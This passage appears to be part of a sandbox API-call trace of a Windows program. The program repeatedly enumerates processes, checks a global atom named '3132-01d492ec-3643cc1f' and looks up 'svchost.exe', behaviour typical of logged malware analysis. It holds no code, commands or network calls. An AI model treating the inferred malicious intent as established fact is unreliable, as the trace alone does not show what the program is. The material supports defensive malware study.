	[0123.904] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.904] CloseHandle (hObject=0x69c) returned 1
	[0123.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0123.904] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.904] CloseHandle (hObject=0x69c) returned 1
	[0123.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0123.904] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.904] CloseHandle (hObject=0x69c) returned 1
	[0123.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0123.904] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.904] CloseHandle (hObject=0x69c) returned 1
	[0123.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0123.905] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.905] CloseHandle (hObject=0x69c) returned 1
	[0123.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0123.905] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.905] CloseHandle (hObject=0x69c) returned 1
	[0123.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0123.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0123.905] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.905] CloseHandle (hObject=0x69c) returned 1
	[0123.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0123.906] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.906] CloseHandle (hObject=0x69c) returned 1
	[0123.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0123.906] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.906] CloseHandle (hObject=0x69c) returned 1
	[0123.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0123.906] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.906] CloseHandle (hObject=0x69c) returned 1
	[0123.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0123.906] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.906] CloseHandle (hObject=0x69c) returned 1
	[0123.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0123.907] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.907] CloseHandle (hObject=0x69c) returned 1
	[0123.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0123.907] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.907] CloseHandle (hObject=0x69c) returned 1
	[0123.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0123.907] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.907] CloseHandle (hObject=0x69c) returned 1
	[0123.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0123.907] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.908] CloseHandle (hObject=0x69c) returned 1
	[0123.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0123.908] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.908] CloseHandle (hObject=0x69c) returned 1
	[0123.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0123.908] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.908] CloseHandle (hObject=0x69c) returned 1
	[0123.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0123.908] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.908] CloseHandle (hObject=0x69c) returned 1
	[0123.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0123.908] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.908] CloseHandle (hObject=0x69c) returned 1
	[0123.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0123.909] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.909] CloseHandle (hObject=0x69c) returned 1
	[0123.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0123.909] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.909] CloseHandle (hObject=0x69c) returned 1
	[0123.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0123.909] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.909] CloseHandle (hObject=0x69c) returned 1
	[0123.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0123.910] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.910] CloseHandle (hObject=0x69c) returned 1
	[0123.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0123.910] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.910] CloseHandle (hObject=0x69c) returned 1
	[0123.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0123.910] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.910] CloseHandle (hObject=0x69c) returned 1
	[0123.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0123.910] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.910] CloseHandle (hObject=0x69c) returned 1
	[0123.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0123.911] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.911] CloseHandle (hObject=0x69c) returned 1
	[0123.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.911] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.911] CloseHandle (hObject=0x69c) returned 1
	[0123.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.911] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.912] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.912] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.915] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.916] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.916] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.916] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.916] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.916] CloseHandle (hObject=0x69c) returned 1
	[0123.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0123.917] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.917] CloseHandle (hObject=0x69c) returned 1
	[0123.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0123.917] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.917] CloseHandle (hObject=0x69c) returned 1
	[0123.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0123.917] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.917] CloseHandle (hObject=0x69c) returned 1
	[0123.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0123.918] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.918] CloseHandle (hObject=0x69c) returned 1
	[0123.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0123.918] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.918] CloseHandle (hObject=0x69c) returned 1
	[0123.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0123.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0123.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0123.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0123.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0123.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0123.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0123.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0123.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0123.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0123.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0123.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0123.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0123.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0123.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0123.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0123.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0123.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0123.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0123.965] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.965] CloseHandle (hObject=0x69c) returned 1
	[0123.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0123.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0123.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0123.966] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.966] CloseHandle (hObject=0x69c) returned 1
	[0123.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0123.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0123.966] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.966] CloseHandle (hObject=0x69c) returned 1
	[0123.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0123.967] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.967] CloseHandle (hObject=0x69c) returned 1
	[0123.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0123.967] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.967] CloseHandle (hObject=0x69c) returned 1
	[0123.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0123.967] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.967] CloseHandle (hObject=0x69c) returned 1
	[0123.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0123.967] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.967] CloseHandle (hObject=0x69c) returned 1
	[0123.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0123.968] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.968] CloseHandle (hObject=0x69c) returned 1
	[0123.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0123.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0123.968] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.968] CloseHandle (hObject=0x69c) returned 1
	[0123.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0123.968] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.968] CloseHandle (hObject=0x69c) returned 1
	[0123.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0123.969] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.969] CloseHandle (hObject=0x69c) returned 1
	[0123.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0123.969] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.969] CloseHandle (hObject=0x69c) returned 1
	[0123.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0123.969] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.969] CloseHandle (hObject=0x69c) returned 1
	[0123.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0123.969] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.970] CloseHandle (hObject=0x69c) returned 1
	[0123.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0123.970] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.970] CloseHandle (hObject=0x69c) returned 1
	[0123.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0123.970] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.970] CloseHandle (hObject=0x69c) returned 1
	[0123.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0123.970] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.971] CloseHandle (hObject=0x69c) returned 1
	[0123.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0123.971] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.971] CloseHandle (hObject=0x69c) returned 1
	[0123.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0123.971] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.971] CloseHandle (hObject=0x69c) returned 1
	[0123.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0123.971] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.971] CloseHandle (hObject=0x69c) returned 1
	[0123.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0123.971] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.971] CloseHandle (hObject=0x69c) returned 1
	[0123.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0123.972] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.972] CloseHandle (hObject=0x69c) returned 1
	[0123.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0123.972] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.972] CloseHandle (hObject=0x69c) returned 1
	[0123.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0123.973] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.973] CloseHandle (hObject=0x69c) returned 1
	[0123.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0123.973] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.973] CloseHandle (hObject=0x69c) returned 1
	[0123.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0123.973] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.973] CloseHandle (hObject=0x69c) returned 1
	[0123.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0123.973] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.973] CloseHandle (hObject=0x69c) returned 1
	[0123.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0123.974] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.974] CloseHandle (hObject=0x69c) returned 1
	[0123.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0123.974] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.974] CloseHandle (hObject=0x69c) returned 1
	[0123.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.974] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.974] CloseHandle (hObject=0x69c) returned 1
	[0123.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.975] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.975] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.975] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.975] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.976] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.976] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.976] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.976] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.976] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.976] CloseHandle (hObject=0x69c) returned 1
	[0123.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0123.977] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.977] CloseHandle (hObject=0x69c) returned 1
	[0123.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0123.977] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.977] CloseHandle (hObject=0x69c) returned 1
	[0123.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0123.977] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.977] CloseHandle (hObject=0x69c) returned 1
	[0123.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0123.977] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.977] CloseHandle (hObject=0x69c) returned 1
	[0123.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0123.978] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.978] CloseHandle (hObject=0x69c) returned 1
	[0124.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0124.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0124.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0124.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0124.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0124.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0124.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0124.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0124.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0124.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0124.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0124.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0124.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0124.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0124.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0124.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0124.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0124.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0124.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0124.019] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.019] CloseHandle (hObject=0x69c) returned 1
	[0124.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0124.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0124.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0124.020] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.020] CloseHandle (hObject=0x69c) returned 1
	[0124.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0124.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0124.020] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.020] CloseHandle (hObject=0x69c) returned 1
	[0124.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0124.020] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.020] CloseHandle (hObject=0x69c) returned 1
	[0124.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0124.021] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.021] CloseHandle (hObject=0x69c) returned 1
	[0124.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0124.021] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.021] CloseHandle (hObject=0x69c) returned 1
